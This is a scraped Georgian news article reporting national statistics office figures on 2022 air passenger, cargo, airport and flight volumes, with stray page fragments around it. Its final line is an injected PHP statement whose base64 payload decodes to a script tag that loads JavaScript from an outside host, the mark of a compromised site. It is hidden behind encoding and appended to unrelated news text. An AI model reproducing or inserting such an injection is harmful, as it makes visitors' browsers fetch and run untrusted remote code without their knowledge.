celsiusi
ავერსი საქკაბელი

სტატისტიკის ეროვნული სამსახურის ინფორმაციით, 2022 წელს საქართველოს საჰაერო ტრანსპორტით გადაყვანილია 178.1 ათასი მგზავრი, ხოლო მგზავრთბრუნვის მოცულობამ 412.2 მლნ. მგზავრ-კილომეტრი შეადგინა. აღნიშნულ პერიოდში გადაყვანილი მგზავრების რაოდენობა – 94.9 პროცენტით, ხოლო მგზავრთბრუნვის მოცულობა 138.3 პროცენტით აღემატება გასული წლის შესაბამის მაჩვენებლებს.

საქსტატის ცნობით, გასულ წელს საქართველოს საჰაერო ტრანსპორტით გადატანილია 667.0 ათასი ტონა ტვირთი, ხოლო ტვირთბრუნვის მოცულობა 1 238.0 მლნ. ტონა-კილომეტრს შეადგენს. გასულ წელთან შედარებით, გადატანილი ტვირთის მოცულობა – 53.7 პროცენტით, ხოლო ტვირთბრუნვის მოცულობა 52.3 პროცენტით გაიზარდა.
ამასთან, უწყების მონაცემებით, 2022 წელს საქართველოს აეროპორტები 4 456.1 ათას მგზავრს მოემსახურა, რაც 79.0 პროცენტით აღემატება გასული წლის შესაბამის მაჩვენებელს.
საქართველოს აეროპორტებმა 2022 წელს მიიღო 2 196.1 ათასი მგზავრი, რაც 75.7 პროცენტით მეტია გასულ წელთან შედარებით, ხოლო აეროპორტებიდან გაემგზავრა 2 260.0 ათასი მგზავრი, რაც 82.4 პროცენტით აღემატება გასული წლის მაჩვენებელს.
2022 წელს საქართველოს აეროპორტებში ტვირთის ნაკადის მოცულობამ 17.9 ათასი ტონა შეადგინა. აქედან 83.2 პროცენტი მიღებული ტვირთია, ხოლო 16.8 პროცენტი – გაგზავნილი. 2022 წელს საქართველოს აეროპორტებში 21.5 ათასი რეისი განხორციელდა, რაც 42.8 პროცენტით აღემატება გასული წლის მაჩვენებელს.
390
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");